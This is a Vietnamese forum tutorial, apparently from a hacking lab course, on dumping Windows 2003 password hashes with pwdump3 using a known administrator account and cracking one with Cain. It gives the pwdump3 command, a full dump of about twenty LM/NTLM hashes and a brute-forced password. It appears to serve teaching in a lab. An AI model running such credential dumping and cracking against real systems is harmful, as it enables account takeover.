System Hacking - Bài 2 - Sử dụng chương trình pwdump3v2 khi có được 1 user administrator của máy nạn nhân để có thể tìm được thông
Trang 1 trong tổng số 1 trang
System Hacking - Bài 2 - Sử dụng chương trình pwdump3v2 khi có được 1 user administrator của máy nạn nhân để có thể tìm được thông
Bài viết liên quan:Bài 1 - Crack password nột bộ nội bộ/Bài 3 - Nâng quyền thông qua chương trình Kaspersky Lab
Máy của nạn nhân sử dụng Window 2003 sp0, và có sẵn user “quyen” password là “cisco”, bây giờ dựa vào account này, ta có thể tìm thêm thông tin của những account khác trong máy.
Trước tiên ta sử dụng pwdump3.exe để xem các tham số cần nhập vào. Sau đó sử dụng lệnh “pwdump3.exe 10.100.100.6 c;\hao2003sp0 quyen”, và nhập vào password của user quyen.
Ta mở file hao2003sp0 để xem trong thông tin.
Ta thấy thông tin user quyen có ID là 500, đây là ID của user administrator trong mạng, và user Guest là 501. Ngoài thông tin trên, ta có thêm thông tin về pash hash của user, bây giờ ta sử dụng chương trình Cain để tìm kiếm thông tin về password của các user khác.
Sử dụng Brute Force Attack với user “hiclassceh” và tìm ra password là “1234a”. Password này chỉ có 5 ký tự và dễ dàng bị Brute Force, tuy nhiên đối với những password là “stong password” (password bao gồm chữ hoa và thường, ký tự, số, ký tự đặc biệt) thì sẽ lâu hơn.
Máy của nạn nhân sử dụng Window 2003 sp0, và có sẵn user “quyen” password là “cisco”, bây giờ dựa vào account này, ta có thể tìm thêm thông tin của những account khác trong máy.
Trước tiên ta sử dụng pwdump3.exe để xem các tham số cần nhập vào. Sau đó sử dụng lệnh “pwdump3.exe 10.100.100.6 c;\hao2003sp0 quyen”, và nhập vào password của user quyen.
Ta mở file hao2003sp0 để xem trong thông tin.
- Code:
1. aaa:1015:NO PASSWORD*********************:NO PASSWORD*********************:::
2.
anhhao:1010:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::
3.
anhhao1:1011:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::
4.
anhhao2:1013:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::
5.
anhhaoceh:1019:B26C623F5254C6A311F64391B17C6CDE:98A2C048C77703D54BD0E88887EFD68E:::
6.
ASPNET:1006:7CACBCC121AC203CD8652FE65BEA4486:7D34A6E7504DFAF453D4213660AE7D35:::
7.
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
8.
hack:1022:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678:::
9.
hacker:1018:BCE739534EA4E445AAD3B435B51404EE:5E7599F673DF11D5C5C4D950F5BF0157:::
10.
hao123:1020:58F907D1C79C344DAAD3B435B51404EE:FD03071D41308B58B9DDBC6D5576D78D:::
11.
haoceh:1016:B3FF8763A6B5CE26AAD3B435B51404EE:7AD94985F28454259BF2A03821FEC8DB:::
12.
hicehclass:1023:B2BEF1B1582C2DC0AAD3B435B51404EE:D6198C25F8420A93301A5792398CF94C:::
13.
IUSR_113-SSR3JKXGW3N:1003:449913C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F4833ABFA52ADA9462:::
14.
IWAM_113-SSR3JKXGW3N:1004:4431005ABF401D86F92DBAC26FDFD3B8:188AA6E0737F12D16D60F8B64F7AE1FA:::
15.
lylam:1012:EE94DC327C009996AAD3B435B51404EE:7A63FB0793A85C960A775497C9D738EE:::
16.
quyen:500:A00B9194BEDB81FEAAD3B435B51404EE:5C800F13A3CE86ED2540DD4E7331E9A2:::
17.
SUPPORT_388945a0:1001:NO
PASSWORD*********************:F791B19C488F4260723561D4F484EA09:::
18.
tam:1014:NO PASSWORD*********************:NO PASSWORD*********************:::
19.
test:1017:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
20.
vic123:1021:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678:::
Ta thấy thông tin user quyen có ID là 500, đây là ID của user administrator trong mạng, và user Guest là 501. Ngoài thông tin trên, ta có thêm thông tin về pash hash của user, bây giờ ta sử dụng chương trình Cain để tìm kiếm thông tin về password của các user khác.
Sử dụng Brute Force Attack với user “hiclassceh” và tìm ra password là “1234a”. Password này chỉ có 5 ký tự và dễ dàng bị Brute Force, tuy nhiên đối với những password là “stong password” (password bao gồm chữ hoa và thường, ký tự, số, ký tự đặc biệt) thì sẽ lâu hơn.
Similar topics
» Thực thi một chương trình bất kỳ dưới quyền hệ thống (system)
» System Hacking - Bài 3 - Nâng quyền thông qua chương trình Kaspersky Lab
» Chương trình Key Logger
» Tạo bẫy chặn các chương trình Web Scanner
» Hướng dẫn viết một chương trình Sniffer
» System Hacking - Bài 3 - Nâng quyền thông qua chương trình Kaspersky Lab
» Chương trình Key Logger
» Tạo bẫy chặn các chương trình Web Scanner
» Hướng dẫn viết một chương trình Sniffer
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
27/8/2013, 11:45 am by echcondihoc
» Quản Lí Tiến Trình Dùng Thư Viện PSAPI
11/10/2011, 9:42 pm by CNTT_DH
» xin tai lieu tieng viet
31/8/2011, 6:59 am by bantoisg
» Theo dõi tiến trình
27/8/2011, 5:51 pm by haigaopro01
» Giải pháp Bảo mật của Cisco
17/6/2011, 8:50 am by admin
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
16/6/2011, 2:32 pm by admin
» Learn to hack !
16/6/2011, 8:49 am by admin
» Giải pháp hệ thống dành cho doanh nghiệp với thiết bị mạng Fortinet (Phần 1)
15/6/2011, 11:12 am by admin
» Ô Long Viên (Tập II)
27/9/2010, 4:56 pm by root
» những ebook về hack tiếng việt cho người mới tìm hiểu.
27/9/2010, 4:54 pm by root